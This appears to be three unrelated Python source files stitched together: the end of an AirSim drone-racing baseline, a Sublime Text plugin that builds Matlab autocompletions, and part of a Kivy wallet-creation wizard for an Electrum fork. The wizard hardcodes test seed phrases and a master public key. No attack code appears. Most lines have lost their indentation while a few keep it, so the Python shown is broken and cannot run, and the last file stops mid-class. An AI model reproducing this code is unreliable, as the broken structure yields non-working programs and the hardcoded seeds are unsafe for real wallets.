                add_position_constraint=True, add_velocity_constraint=False, add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
            future.join()
        return future
def fly_through_all_gates_at_once_with_moveOnSpline(self):
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy", "ZhangJiaJie_Medium", "Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"] :
vel_max = 30.0
acc_max = 15.0
if self.level_name == "Building99_Hard":
vel_max = 4.0
acc_max = 1.0
return self.airsim_client.moveOnSplineAsync([gate_pose.position for gate_pose in self.gate_poses_ground_truth], vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=False, add_acceleration_constraint=False, viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints(self):
add_velocity_constraint = True
add_acceleration_constraint = False
if self.level_name in ["Soccer_Field_Medium", "Soccer_Field_Easy"] :
vel_max = 15.0
acc_max = 3.0
speed_through_gate = 2.5
if self.level_name == "ZhangJiaJie_Medium":
vel_max = 10.0
acc_max = 3.0
speed_through_gate = 1.0
if self.level_name == "Building99_Hard":
vel_max = 2.0
acc_max = 0.5
speed_through_gate = 0.5
add_velocity_constraint = False
        # scale param scales the gate facing vector by the desired speed.
        # As above, gate_pose was previously undefined here; fly through each gate in turn
        # and return the last trajectory future so the caller's .join() still works.
        future = None
        for gate_pose in self.gate_poses_ground_truth:
            future = self.airsim_client.moveOnSplineVelConstraintsAsync([gate_pose.position],
                [self.get_gate_facing_vector_from_quaternion(gate_pose.orientation, scale = speed_through_gate)],
                vel_max=vel_max, acc_max=acc_max,
                add_position_constraint=True, add_velocity_constraint=add_velocity_constraint, add_acceleration_constraint=add_acceleration_constraint,
                viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
            future.join()
        return future
def fly_through_all_gates_at_once_with_moveOnSplineVelConstraints(self):
if self.level_name in ["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium"]:
vel_max = 15.0
acc_max = 7.5
speed_through_gate = 2.5
if self.level_name == "Building99_Hard":
vel_max = 5.0
acc_max = 2.0
speed_through_gate = 1.0
return self.airsim_client.moveOnSplineVelConstraintsAsync([gate_pose.position for gate_pose in self.gate_poses_ground_truth],
[self.get_gate_facing_vector_from_quaternion(gate_pose.orientation, scale = speed_through_gate) for gate_pose in self.gate_poses_ground_truth],
vel_max=vel_max, acc_max=acc_max,
add_position_constraint=True, add_velocity_constraint=True, add_acceleration_constraint=False,
viz_traj=self.viz_traj, viz_traj_color_rgba=self.viz_traj_color_rgba, vehicle_name=self.drone_name)
def image_callback(self):
# get uncompressed fpv cam image
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
response = self.airsim_client_images.simGetImages(request)
        img_rgb_1d = np.frombuffer(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
if self.viz_image_cv2:
cv2.imshow("img_rgb", img_rgb)
cv2.waitKey(1)
def odometry_callback(self):
print("odometry callback")
self.state = self.airsim_client_odom.getMultirotorState()
# in world frame:
# position = drone_state.kinematics_estimated.position
# orientation = drone_state.kinematics_estimated.orientation
# linear_velocity = drone_state.kinematics_estimated.linear_velocity
# angular_velocity = drone_state.kinematics_estimated.angular_velocity
# call task() method every "period" seconds.
def repeat_timer_image_callback(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def repeat_timer_odometry_callback(self, task, period):
while self.is_odometry_thread_active:
task()
time.sleep(period)
def start_image_callback_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started image callback thread")
def stop_image_callback_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def start_odometry_callback_thread(self):
if not self.is_odometry_thread_active:
self.is_odometry_thread_active = True
self.odometry_callback_thread.start()
print("Started odometry callback thread")
def stop_odometry_callback_thread(self):
if self.is_odometry_thread_active:
self.is_odometry_thread_active = False
self.odometry_callback_thread.join()
print("Stopped odometry callback thread.")
def controller_log(log_string):
print("CONTROLLER: ", log_string)
def main(args):
# ensure you have generated the neurips planning settings file by running python generate_settings_file.py
baseline_racer = BaselineRacer(drone_name="drone_1", viz_traj=args.viz_traj, viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], viz_image_cv2=args.viz_image_cv2)
baseline_racer.load_level(args.level_name)
baseline_racer.get_ground_truth_gate_poses()
if args.level_name == "Qualifier_Tier_1":
args.race_tier = 1
if args.level_name == "Qualifier_Tier_2":
args.race_tier = 2
if args.level_name == "Qualifier_Tier_3":
args.race_tier = 3
baseline_racer.start_race(args.race_tier)
baseline_racer.initialize_drone()
baseline_racer.takeoff_with_moveOnSpline()
# baseline_racer.get_ground_truth_gate_poses()
baseline_racer.start_image_callback_thread()
baseline_racer.start_odometry_callback_thread()
if args.planning_baseline_type == "all_gates_at_once" :
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_at_once_with_moveOnSplineVelConstraints().join()
if args.planning_baseline_type == "all_gates_one_by_one":
if args.planning_and_control_api == "moveOnSpline":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSpline().join()
if args.planning_and_control_api == "moveOnSplineVelConstraints":
baseline_racer.fly_through_all_gates_one_by_one_with_moveOnSplineVelConstraints().join()
baseline_racer.stop_image_callback_thread()
baseline_racer.stop_odometry_callback_thread()
baseline_racer.reset_race()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--level_name', type=str, choices=["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium", "Building99_Hard",
"Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"], default="ZhangJiaJie_Medium")
parser.add_argument('--planning_baseline_type', type=str, choices=["all_gates_at_once","all_gates_one_by_one"], default="all_gates_at_once")
parser.add_argument('--planning_and_control_api', type=str, choices=["moveOnSpline", "moveOnSplineVelConstraints"], default="moveOnSpline")
parser.add_argument('--enable_viz_traj', dest='viz_traj', action='store_true', default=False)
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
parser.add_argument('--race_tier', type=int, choices=[1,2,3], default=1)
args = parser.parse_args()
main(args)
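# Example invocation (illustrative):
#   python baseline_racer.py --level_name ZhangJiaJie_Medium --planning_baseline_type all_gates_at_once \
#       --planning_and_control_api moveOnSpline --enable_viz_traj --race_tier 1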
|
am_completions_generate.py
|
import re
from os import listdir, walk, makedirs
from os.path import isdir, isfile, join, split
import errno
import json
import pickle
import collections
import time
import threading
import sublime
import sublime_plugin
def plugin_loaded():
"""Do imports that need to wait for Sublime API initilization
"""
global config, abspath, mfun
import AutoMatlab.lib.config as config
from AutoMatlab.lib.abspath import abspath
from AutoMatlab.lib.mfun import mfun
def process_signature(signature):
"""Process a functionSignatures.json file to extract Matlab function names
from it.
Although functionSignatures.json contains the autocompletion information
that Matlab natively uses, only the function names are extracted from this
file by AutoMatlab. The reason is that the autocompletion information in
functionSignatures.json is very inconsistent and incomplete.
"""
if not isfile(signature):
return []
# read as string data
with open(signature) as fh:
data = fh.read()
    # remove comments, as the Python json parser has issues with those
    pattern = r'\/\/.*'
    data = re.sub(pattern, '', data)
    # remove line breaks in multiline strings, as they are not standard JSON
    pattern = r'\.\.\.\s+'
    data = re.sub(pattern, '', data)
    # place commas between sequences of strings, as this is required by JSON
pattern = r'"\s+"'
data = re.sub(pattern, '","', data)
# # read json with custom decoder, to retain duplicate keys
# decoder = json.JSONDecoder(object_pairs_hook=lambda x: tuple(x))
# signatures = decoder.decode(data)
# read json
try:
fun_dict = json.loads(data)
    except ValueError:
msg = '[WARNING] AutoMatlab - Failed to decode json file: ' + signature
# print(msg)
return []
# extract all function names
funs = []
for fun in fun_dict.keys():
funs.append(fun)
return funs
def process_contents(contents):
"""Process a Contents.m file to extract Matlab function names from it.
This function expects the default Matlab structure of Contents.m files.
Unfortunately, this structure is not always faithfully applied, in which
case AutoMatlab won't recognize the functions.
"""
if not isfile(contents):
return []
# read data line by line
funs = []
with open(contents, encoding='cp1252') as fh:
try:
line = fh.readline()
except:
return funs
while line:
# interrupt at copyright message
if 'copyright' in line.lower():
break
# extract function name
pattern = r'^\s*%\s*(\w+)\s+-'
mo = re.search(pattern, line)
if mo:
funs.append(mo.group(1))
# read next line
try:
line = fh.readline()
except:
return funs
return funs
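# For reference, the pattern above matches Contents.m lines of the default Matlab form
# "%   funcname   - one-line description", capturing "funcname" as the function name.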
def process_pathdef(matlab_pathdef_path, matlabroot):
"""Process pathdef.m file to extract all directories in the Matlab path.
"""
matlab_path_dirs = []
abs_dir_regex = re.compile(r"'(.+);'")
rel_dir_regex = re.compile(r"'[\\\/]*(.+);'")
# open pathdef file
with open(matlab_pathdef_path, encoding='cp1252') as fh:
line = fh.readline()
process_line = False
# read line by line
while line:
# stop processing at END ENTRIES
if 'END ENTRIES' in line:
break
# process lines containing directories
if process_line:
if 'matlabroot' in line:
# ensure dir is extracted as relative dir
mo = rel_dir_regex.search(line)
if mo:
matlab_path_dirs.append(
abspath(mo.group(1), matlabroot))
else:
# read dir as absolute dir
mo = abs_dir_regex.search(line)
if mo:
matlab_path_dirs.append(abspath(mo.group(1)))
# start processing at BEGIN ENTRIES
if 'BEGIN ENTRIES' in line:
process_line = True
# read next line
line = fh.readline()
return matlab_path_dirs
class GenerateAutoMatlabCompletionsCommand(sublime_plugin.WindowCommand):
"""Generate Matlab autocompletion information by parsing the
current Matlab installation.
"""
def __init__(self, window):
"""Initialize threads for completion generation
"""
super().__init__(window)
# prepare a (probably unnecessary) thread lock
self.lock = threading.Lock()
self.finished = True
self.n_completions = 0
self.matlabroot = ''
def run(self):
"""Start threads for generating matlab completion
"""
# prevent simultaneous threads for matlab completion generation
self.lock.acquire()
finished = self.finished
if finished:
self.finished = False
self.lock.release()
if finished:
# run threads to generate matlab completions
self.error = False
threading.Thread(target=self.show_status).start()
threading.Thread(target=self.generate_completions).start()
else:
msg = '[INFO] AutoMatlab - Matlab completions are already ' \
'being generated'
# print(msg)
self.window.status_message(msg)
def show_status(self):
"""Show status bar indicator for ongoing completion generation
"""
busy = True
while busy:
# create moving status bar position
pos = abs(int(time.time() % 1.5 * 4) - 3)
msg = "[{}] AutoMatlab - Generating Matlab completions. " \
"This might take several minutues.".format(
" " * pos + "=" + " " * (3 - pos))
self.window.status_message(msg)
time.sleep(0.125)
# check if matlab completion generation finished
self.lock.acquire()
if self.finished:
busy = False
if not self.error:
msg = '[INFO] AutoMatlab - Found {}'.format(
self.n_completions) + ' Matlab function completions'
print(msg)
self.window.status_message(msg)
self.lock.release()
def generate_completions(self):
"""Generate matlab completions
"""
self.matlab_completions = {}
# read settings
settings = sublime.load_settings('AutoMatlab.sublime-settings')
include_dirs = settings.get('include_dirs', [])
exclude_dirs = settings.get('exclude_dirs', [])
exclude_patterns = settings.get('exclude_patterns', [])
use_contents_files = settings.get('use_contents_files', 'dir')
use_signatures_files = settings.get('use_signatures_files', 'dir')
use_matlab_path = settings.get('use_matlab_path', 'ignore')
self.matlabroot = settings.get('matlabroot', 'default')
if self.matlabroot == 'default':
self.matlabroot = config.DEFAULT_MATLABROOT
else:
self.matlabroot = abspath(self.matlabroot)
matlab_pathdef_path = settings.get('matlab_pathdef_path', 'default')
if matlab_pathdef_path == 'default':
matlab_pathdef_path = config.DEFAULT_MATLAB_PATHDEF_PATH
matlab_pathdef_path = abspath(matlab_pathdef_path, self.matlabroot)
# assertions
try:
assert type(self.matlabroot) == str, \
"[ERROR] AutoMatlab - Matlabroot is not of type 'str'"
assert type(matlab_pathdef_path) == str, \
"[ERROR] AutoMatlab - Matlab_pathdef_path is not of type 'str'"
assert type(include_dirs) == list, \
"[ERROR] AutoMatlab - Include_dirs is not of type 'list'"
assert type(exclude_dirs) == list, \
"[ERROR] AutoMatlab - Exclude_dirs is not of type 'list'"
assert type(exclude_patterns) == list, \
"[ERROR] AutoMatlab - Exclude_patterns is not of type 'list'"
assert use_contents_files in ['dir', 'read', 'ignore'], \
"[ERROR] AutoMatlab - Invalid value for 'use_contents_files'"
assert use_signatures_files in ['dir', 'read', 'ignore'], \
"[ERROR] AutoMatlab - Invalid value for 'use_signatures_files'"
            assert use_matlab_path in ['dir', 'read', 'ignore'], \
                "[ERROR] AutoMatlab - Invalid value for 'use_matlab_path'"
except Exception as e:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
# check matlabroot
if not isfile(join(str(self.matlabroot), 'bin', 'matlab.exe')):
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
            msg = '[ERROR] AutoMatlab - Matlab installation could not be ' \
                'found at the specified location'
self.window.status_message(msg)
raise Exception(msg)
return
# process include/exclude dirs
include_dirs = abspath(include_dirs, self.matlabroot)
exclude_dirs = abspath(exclude_dirs, self.matlabroot)
# read the matlab path and parse its dirs
if use_matlab_path in ['dir', 'read']:
# check pathdef file
if not isfile(matlab_pathdef_path):
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
msg = '[ERROR] AutoMatlab - Specified pathdef.m is invalid'
self.window.status_message(msg)
raise Exception(msg)
return
# get dirs in matlab path
matlab_path_dirs = process_pathdef(matlab_pathdef_path,
self.matlabroot)
# parse dirs in matlab path
for path_dir in matlab_path_dirs:
if isdir(path_dir):
# apply exclude dirs and patterns
if any([excl for excl in exclude_dirs
if path_dir.startswith(excl)]) \
or any([excl for excl in exclude_patterns
if excl in path_dir]):
continue
# process files in path dir
for file in listdir(path_dir):
self.compose_completion(mfun(join(path_dir, file)))
# walk through files of matlab toolboxes
for root, dirs, files in walk(join(self.matlabroot, 'toolbox')):
# apply exclude dirs and patterns
if any([excl for excl in exclude_dirs if root.startswith(excl)]) \
or any([excl for excl in exclude_patterns if excl in root]):
continue
# process entire dirs
if (use_signatures_files == 'dir'
and config.SIGNATURES_NAME in files) \
or (use_contents_files == 'dir'
and config.CONTENTS_NAME in files):
for file in files:
self.compose_completion(mfun(join(root, file)))
continue
# process signature files
if use_signatures_files == 'read' \
and config.SIGNATURES_NAME in files:
for fun in process_signature(
join(root, config.SIGNATURES_NAME)):
self.compose_completion(mfun(join(root, fun + '.m')))
# process contents files
if use_contents_files == 'read'\
and config.CONTENTS_NAME in files:
for fun in process_contents(
join(root, config.CONTENTS_NAME)):
self.compose_completion(mfun(join(root, fun + '.m')))
# parse custom include dirs
for include in include_dirs:
# check wildcard
if not include:
continue
wildcard = include[-1]
if wildcard in ['+', '*']:
include = include[:-1]
for root, dirs, files in walk(include):
# extract completion from file
for f in files:
self.compose_completion(mfun(join(root, f)))
# set which subdirs to include
if wildcard == '+':
# only include package dirs and apply exclude dirs/patterns
dirs[:] = \
[d for d in dirs
if d.startswith('+')
and not(any([excl for excl in exclude_dirs
if abspath(d, root).startswith(excl)])
or any([excl for excl in exclude_patterns
if excl in d and not excl == "+"]))]
elif wildcard == '*':
# apply exclude dirs/patterns
dirs[:] = \
[d for d in dirs
if not(any([excl for excl in exclude_dirs
if abspath(d, root).startswith(excl)])
or any([excl for excl in exclude_patterns
if excl in d]))]
else:
# exclude all
dirs[:] = []
# sort results
sorted_matlab_completions = collections.OrderedDict(
sorted(self.matlab_completions.items()))
# get store path
storage_path = abspath(config.MATLAB_COMPLETIONS_PATH,
sublime.packages_path())
try:
# make storage dir if non-existent
makedirs(split(storage_path)[0])
except OSError as e:
if e.errno != errno.EEXIST:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
except Exception as e:
self.lock.acquire()
self.error = True
self.finished = True
self.lock.release()
self.window.status_message(str(e))
raise e
return
# store results
with open(storage_path, 'bw') as fh:
pickle.dump(sorted_matlab_completions, fh)
self.lock.acquire()
self.n_completions = len(self.matlab_completions)
self.finished = True
self.lock.release()
def compose_completion(self, mfun_data):
"""Compose completion and add to completions dictionary
"""
if not mfun_data.valid:
return
# add data to matlab completions
if mfun_data.path.startswith(self.matlabroot + '\\'):
crop = len(self.matlabroot) + 1
else:
crop = 0
self.matlab_completions[mfun_data.fun.lower()] = \
[mfun_data.fun, mfun_data.annotation, mfun_data.path[crop:]]
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum_vestx.base_wizard import BaseWizard
from electrum_vestx.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_vestx.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum_vestx/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum_vestx/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: 1, 1, 1, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0.525, 0.0, 0.325, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
canvas.before:
Rectangle:
size: Window.size
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'VESTX ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_vestx/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum_vestx/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum_vestx/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
        except ValueError:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
